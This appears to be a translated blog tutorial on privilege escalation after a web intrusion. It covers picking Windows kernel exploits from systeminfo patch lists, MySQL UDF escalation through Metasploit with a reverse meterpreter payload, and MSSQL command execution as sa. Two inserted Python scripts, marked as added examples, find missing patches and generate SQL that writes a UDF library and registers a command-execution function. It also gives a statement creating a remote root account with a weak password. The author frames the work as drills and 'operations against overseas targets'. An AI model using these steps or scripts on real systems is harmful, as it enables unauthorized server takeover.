Recently a junior colleague told me that interviewers keep asking about privilege escalation and it always stumps him. Well, "interview for building an aircraft carrier, then spend the job tightening screws" applies everywhere, so today I will write up privilege escalation as I understand it. First of all, privilege escalation is mostly used in intranet penetration, and by intranet penetration I do not mean a penetration test that happens to run inside an intranet, but the special scenarios (attack-defence exercises, HW drills, operations against overseas targets) where you break in from the outside and run into a privilege problem during post-exploitation. (No flaming please: I honestly cannot think of anywhere else escalation gets done. An ordinary security assessment never needs this skill, since the traditional craft stops at proof of concept.)
What is privilege escalation
During a web intrusion it means using a vulnerability in the website or in the server's operating system to raise the privileges of the current foothold (typically the low-privileged account the web shell runs as) until we hold the highest privileges on the server.
Two ways to escalate rights
System vulnerability escalation
Linux Kernel <= 2.6.37 local privilege escalation
MS09-012: Pr.exe (patched by KB952004)
MS09-012: Churrasco ("barbecue", patched by KB956572)
Windows tracing registry ACL privilege escalation vulnerability
There are many such local privilege escalation cases; here I take Windows Server as the example. With so many escalation exploits ("horses") around, how do you pick one in a real engagement? The systeminfo command prints the system information, including the list of installed hotfixes (KB numbers). Paste that patch list into one of the online patch-comparison sites and it reports which escalation vulnerabilities are still unpatched, together with details on the matching exploit. Note that a bulletin such as MS09-012 shipped as more than one patch (KB952004 and KB956572), so the host is only closed when all of them are installed.
Another guy asked me: that is too much hassle, is there a way to write the systeminfo output to a file and then feed it to an automated tool for offline identification?
Here I only cover redirecting the command output to a txt file, which is trivial:
systeminfo > directory/filename
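The comparison the online sites do can also be run locally against that saved file. The script below is an added example, not code from the original post or from any tool it mentions: it parses saved systeminfo output for the installed KB numbers and the OS name, then compares them against a bulletin table that here holds only the MS09-012 entry the post itself lists (KB952004 and KB956572). The sample systeminfo text and the bulletin table are constructed for illustration; to be useful beyond that one bulletin the table has to be filled from a real patch database.

```python
import re

# Constructed sample of `systeminfo > sysinfo.txt` from a Windows Server host,
# trimmed to the fields the check needs; not captured from a real machine.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN-TARGET
OS Name:                   Microsoft Windows Server 2003 R2, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
System Type:               X86-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB952004
                           [02]: KB958644
                           [03]: Q147222
"""

# Bulletin table: the KBs that close a bulletin and the OS families it applies to.
# Only the bulletin the article names is listed (MS09-012 shipped as two separate
# patches, KB952004 and KB956572); a real check needs the full table that the
# online patch-comparison sites maintain.
BULLETIN_TABLE = {
    "MS09-012 (Churrasco / Pr.exe)": {
        "kbs": {"KB952004", "KB956572"},
        "affects": ("Windows 2000", "Windows XP", "Windows Server 2003",
                    "Windows Vista", "Windows Server 2008"),
    },
}

KB_RE = re.compile(r"\bKB\d{4,7}\b", re.IGNORECASE)


def parse_hotfixes(text):
    """Return the set of installed KB identifiers (upper-cased)."""
    return {m.group(0).upper() for m in KB_RE.finditer(text)}


def parse_os(text):
    """Pull OS name, version line and bitness out of systeminfo output."""
    def field(label):
        m = re.search(r"^%s:\s*(.+?)\s*$" % re.escape(label), text, re.MULTILINE)
        return m.group(1) if m else ""
    system_type = field("System Type")          # "X86-based PC" / "x64-based PC"
    bits = 64 if "64" in system_type else 32
    return {"name": field("OS Name"), "version": field("OS Version"), "bits": bits}


def missing_bulletins(text, table=BULLETIN_TABLE):
    """Map each applicable, not fully patched bulletin to the KBs still missing.

    A bulletin counts as closed only when every KB it shipped with is present;
    bulletins for other OS families are skipped so they do not show as missing."""
    installed = parse_hotfixes(text)
    os_name = parse_os(text)["name"]
    result = {}
    for bulletin, info in table.items():
        if not any(fam in os_name for fam in info["affects"]):
            continue
        gap = info["kbs"] - installed
        if gap:
            result[bulletin] = gap
    return result


def report(text):
    os_info = parse_os(text)
    lines = ["%s (%s, %d-bit)" % (os_info["name"], os_info["version"], os_info["bits"]),
             "installed hotfixes: %s" % ", ".join(sorted(parse_hotfixes(text)))]
    for bulletin, gap in sorted(missing_bulletins(text).items()):
        lines.append("candidate: %s, missing %s" % (bulletin, ", ".join(sorted(gap))))
    return "\n".join(lines)


if __name__ == "__main__":
    import sys
    # systeminfo writes in the console code page; on a zh-CN box pass "gbk".
    if len(sys.argv) > 1:
        enc = sys.argv[2] if len(sys.argv) > 2 else "utf-8"
        with open(sys.argv[1], encoding=enc, errors="replace") as fh:
            print(report(fh.read()))
    else:
        print(report(SAMPLE_SYSTEMINFO))
```

Run it as python check_patches.py sysinfo.txt gbk on output captured from a Chinese-locale host, because systeminfo writes in the console code page rather than UTF-8. The OS-family filter matters: without it every Server 2003 bulletin would be reported as "missing" on a Server 2012 host. When systeminfo prints Hotfix(s): N/A, which it does on some builds, pull the list with wmic qfe list instead and feed that text in.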
There is not much more to say about system-vulnerability escalation; the manual experts do it their own way. Its drawbacks are also obvious: these escalation exploits are well-known binaries, so if the target has a firewall and antivirus they get flagged and killed, and running them quietly is a lost cause. This is for study only; do not get yourself caught, and do not drag me in when you do.
Third-party software privilege escalation
What does third-party software mean here? Some tools install a service that runs as an administrator or SYSTEM account (or create such an account during installation), and any command issued through that software inherits its privileges. We can abuse this mechanism to escalate.
Serv-U (local admin port 43958)
VNC privilege escalation
SQL Server sa account
Obviously some of these no longer fit today's environment, since the software has moved on. So here are the ones I have actually run into: the well-known MySQL UDF escalation and MSSQL escalation.
MySQL UDF privilege escalation
The exploit/multi/mysql/mysql_udf_payload module in MSF automates UDF escalation. MSF writes a DLL into the lib\plugin\ directory under the MySQL install (the directory must already exist; if it does not, the module fails), under a randomly generated file name. The DLL exports, among others, the functions sys_exec() and sys_eval(), but the module only registers sys_exec(), which returns no command output. We can register sys_eval() by hand from the same DLL to get command output back. Prerequisites:
1. The database user is allowed to log in remotely.
2. We know the username and password.
What if the user has no remote-login permission? Then, of course, find a way to log in to the database from the local side and create a remote-capable user by hand.
1. Log in to the target and create a remote-access user. Run the SQL statement below to create a user that may connect from any host (Figure 1):
grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;
This GRANT ... IDENTIFIED BY form only works up to MySQL 5.7; on 8.0 the account has to be created with CREATE USER first and then granted.
2. In Kali, start msfconsole and enter search mysql_udf_payload (Figure 2).
3. use exploit/multi/mysql/mysql_udf_payload (Figure 3).
4. show payloads to list the usable payloads (Figure 4).
5. set payload windows/meterpreter/reverse_http (Figure 5).
6. Set the database credentials, target and listener: set rhosts, set username, set password, set lport (Figure 6), then exploit.
Small experiment
Log in with that account using the Navicat GUI and run the following statements.
select sys_exec('whoami');
This runs the OS command; MSF registers sys_exec by default, it prints nothing and returns 0 on success.
create function sys_eval returns string soname 'wsODEVzX.dll';
This registers the function that does echo output by hand; the .dll name is the random one MSF generated and can be read straight off the Kali console.
select sys_eval('whoami');
Run it once, as shown in Figure 9.
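Before registering sys_eval by hand as above (and before trusting the MSF module at all) it pays to check the preconditions the post mentions, plus two it does not: secure_file_priv and library bitness. The script below is an added example, not part of the post or of Metasploit. It takes the results of the recon queries (SELECT @@version, @@version_compile_os, @@version_compile_machine, @@plugin_dir, @@secure_file_priv; SELECT name, dl FROM mysql.func) and decides whether a UDF escalation can work, which directory the library must land in, and the exact statements to run, reusing an MSF-written library when mysql.func shows sys_exec already registered. The RECON values, the udfsys name and the DLL hex are constructed placeholders; the pre-5.1 fallback directories are an assumption.

```python
import re

# Constructed recon results gathered as the MySQL user before trying UDF escalation
# (SELECT @@version, @@version_compile_os, @@version_compile_machine, @@plugin_dir,
# @@secure_file_priv; SELECT name, dl FROM mysql.func). Not from a real server.
RECON = {
    "version": "5.5.53",
    "version_compile_os": "Win64",
    "version_compile_machine": "x86_64",
    "plugin_dir": "C:\\phpStudy\\MySQL\\lib\\plugin\\",
    "secure_file_priv": "",   # "" = unrestricted; "NULL" = file writes disabled
    "existing_funcs": {},     # name -> dl, from mysql.func
}

# Hex of a lib_mysqludf_sys library. Placeholder only: a real run needs the
# build matching the server's bitness (copies ship with Metasploit and sqlmap).
DLL_HEX = "4d5a90000300000004000000ffff0000"   # constructed, truncated MZ header


def version_tuple(v):
    return tuple(int(x) for x in re.findall(r"\d+", v)[:3])


def server_bits(recon):
    # Win64 / x86_64 -> 64, Win32 / i686 / x86 -> 32
    return 64 if ("64" in recon["version_compile_os"]
                  or "64" in recon["version_compile_machine"]) else 32


def plan_udf(recon, dll_bits, dll_hex=DLL_HEX, name="udfsys"):
    """Check the preconditions for a UDF escalation and return the statements
    to run. 'reasons' lists every failed precondition; run nothing unless it is empty."""
    reasons = []
    if dll_bits != server_bits(recon):
        reasons.append("library is %d-bit, server is %d-bit" % (dll_bits, server_bits(recon)))

    win = recon["version_compile_os"].lower().startswith("win")
    sep = "\\" if win else "/"
    if version_tuple(recon["version"]) >= (5, 1, 0):
        # 5.1+ only loads UDF libraries from plugin_dir (the article's lib\plugin);
        # the directory must exist, which these queries cannot tell you.
        target_dir = recon["plugin_dir"]
    else:
        # Pre-5.1 servers use the normal loader search path. Assumed defaults:
        target_dir = "C:\\Windows\\System32\\" if win else "/usr/lib/"
    if not target_dir.endswith(sep):
        target_dir += sep

    sfp = recon["secure_file_priv"]
    if sfp is None or sfp == "NULL":
        reasons.append("secure_file_priv is NULL: SELECT ... INTO DUMPFILE is disabled")
    elif sfp != "":
        # a non-empty value restricts file writes to that directory tree
        allowed = sfp if sfp.endswith(sep) else sfp + sep
        a, t = (allowed.lower(), target_dir.lower()) if win else (allowed, target_dir)
        if not t.startswith(a):
            reasons.append("secure_file_priv=%s does not cover %s" % (sfp, target_dir))

    ext = "dll" if win else "so"
    path = target_dir + name + "." + ext
    funcs = recon["existing_funcs"]
    stmts = []
    if "sys_eval" in funcs:
        pass                                 # already registered, just call it
    elif "sys_exec" in funcs:
        # MSF's module left sys_exec behind: reuse its library, as the article does
        stmts.append("CREATE FUNCTION sys_eval RETURNS STRING SONAME '%s';" % funcs["sys_exec"])
    else:
        # MySQL string literals treat backslash as an escape, hence the doubling
        stmts.append("SELECT 0x%s INTO DUMPFILE '%s';" % (dll_hex, path.replace("\\", "\\\\")))
        stmts.append("CREATE FUNCTION sys_eval RETURNS STRING SONAME '%s.%s';" % (name, ext))
    stmts.append("SELECT sys_eval('whoami');")
    stmts.append("DROP FUNCTION sys_eval;")   # cleanup; the file itself must be removed out of band
    return {"ok": not reasons, "reasons": reasons, "dll_path": path, "statements": stmts}


if __name__ == "__main__":
    plan = plan_udf(RECON, dll_bits=64)
    print("feasible:", plan["ok"], plan["reasons"])
    print("\n".join(plan["statements"]))
```

The bitness and secure_file_priv checks are the two that silently break the MSF module: a 32-bit library on a 64-bit mysqld fails at CREATE FUNCTION with a loader error, and a secure_file_priv that does not cover plugin_dir makes the DUMPFILE write fail before anything is registered. The DROP FUNCTION at the end only removes the registration; the library file stays in plugin_dir until deleted from the shell you obtained.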
MSSQL privilege escalation
With the sa user (the default) and its password, here rising00.00!123, run the following in msfconsole to perform MSSQL escalation:
search mssql
use auxiliary/admin/mssql/mssql_exec
set rhosts 10.10.59.247
set password rising00.00!123
set cmd whoami
show options
exploit
The module runs the command through xp_cmdshell and tries to enable it with sp_configure if it is switched off; the username defaults to sa, so it only needs setting when the account differs. The whoami output is the SQL Server service account, which is exactly the privilege level this route gives you.
I do not run into many escalation scenarios myself; most of the time it is system-vulnerability escalation. In practice the preconditions for escalating through third-party database components are very demanding.